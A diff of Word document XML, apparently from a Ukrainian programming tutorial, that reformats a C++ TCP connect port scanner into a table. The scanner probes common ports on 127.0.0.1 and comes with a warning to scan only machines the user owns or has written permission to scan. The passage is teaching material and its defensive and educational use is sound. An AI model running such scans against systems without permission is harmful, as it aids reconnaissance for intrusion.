-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">const ServiceName KNOWN_SERVICES[] = {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    {21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    {53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    {443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    {5432, "PostgreSQL"}, {8080, "HTTP-alt"}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">};</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">const char* serviceName(int port) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    for (const ServiceName&amp; service : KNOWN_SERVICES) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        if (service.port == port) return service.name;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    return "Unknown";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// Спроба встановити з'єднання: успіх означає, що порт відкритий</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">bool isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    socket_t sock = socket(AF_INET, SOCK_STREAM, 0);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    if (sock == INVALID_SOCK) return false;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    // Обмежуємо час очікування, інакше сканування триватиме надто довго</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">               reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#else</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000 };</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &amp;timeout, sizeof(timeout));</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#endif</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sockaddr_in address{};</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    address.sin_family = AF_INET;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    bool opened =</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) == 0;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    closesocket(sock);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    return opened;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">int main() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    // УВАГА: сканувати дозволено лише власний комп'ютер або вузол,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    // на який є письмовий дозвіл власника</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    const std::string target = "127.0.0.1";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    const std::vector&lt;int&gt; ports = {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        21, 22, 23, 25, 53, 80, 110, 135, 139, 143,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    };</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    WSADATA wsa;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    if (WSAStartup(MAKEWORD(2, 2), &amp;wsa) != 0) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        return 1;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#endif</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Сканування " &lt;&lt; target &lt;&lt; "...\n\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Відкриті порти:\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    int found = 0;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    for (int port : ports) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        if (isPortOpen(target, port)) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">            std::cout &lt;&lt; "  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port) &lt;&lt; "\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">            ++found;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    if (found == 0) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        std::cout &lt;&lt; "  (жодного з перевірених портів не відкрито)\n";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    WSACleanup();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#endif</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    return 0;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// у властивостях додати бібліотеку ws2_32.lib</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// (Linker → Input → Additional Dependencies).</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;vector&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;winsock2.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;ws2tcpip.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #pragma comment(lib, "ws2_32.lib")</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  using socket_t = SOCKET;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  const socket_t INVALID_SOCK = INVALID_SOCKET;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#else</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;sys/socket.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;arpa/inet.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;unistd.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  using socket_t = int;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  const socket_t INVALID_SOCK = -1;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #define closesocket close</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
